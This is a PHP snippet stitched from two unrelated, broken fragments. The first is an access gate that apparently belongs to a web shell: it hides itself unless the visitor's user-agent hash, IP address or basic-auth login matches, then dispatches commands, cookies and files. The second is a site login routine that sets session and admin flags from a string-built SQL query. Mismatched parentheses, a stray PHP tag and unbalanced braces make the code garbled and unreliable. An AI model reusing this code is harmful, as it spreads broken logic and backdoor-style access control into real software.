// Authentication switcher
case 0:
break;
case 1:
if (md5($_SERVER['HTTP_USER_AGENT']) != $uakey) {
hide();
}
break;
case 2:
if (!in_array($_SERVER['REMOTE_ADDR'], $IP)) {
hide();
}
break;
case 3:
if (!$_SERVER["PHP_AUTH_USER"]) {
userauth();
}
break;
}
function userauth()
{
// Basic authentication function
global $user, $pass;
header("WWW-Authenticate: Basic realm='Secure Area'");
if (md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)) {
hide();
die;
}
}
if (!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img) {
main();
<?php
}
}
//------------ end else ----------------
/*********************************************************
inLogin
*********************************************************/
if (!isset($_SESSION['LoginID']) || empty($_SESSION['LoginID'])) {
$ErrMsg = "";
if (!isset($ID)) {
$ID = "";
}
if (isset($Submit)) {
if (strlen($ID) > 0 && strlen($ID) <= 15 && $ID == addslashes($ID)) {
$Authorized = userauth($ID, $PWD, $db_conn);
if ($Authorized) {
$sqlcmd = "SELECT * FROM Member WHERE id='{$ID}' AND state<>'N'";
$rs = querydb($sqlcmd, $db_conn);
$LoginID = $rs[0]['id'];
$_SESSION['LoginID'] = $LoginID;
//--------- For admin --------
if ($rs[0]['state'] == 'A') {
$_SESSION['Admin'] = 1;
}
?>
<script language=javascript>
location=$WebHost;
</script>
<?php
exit;
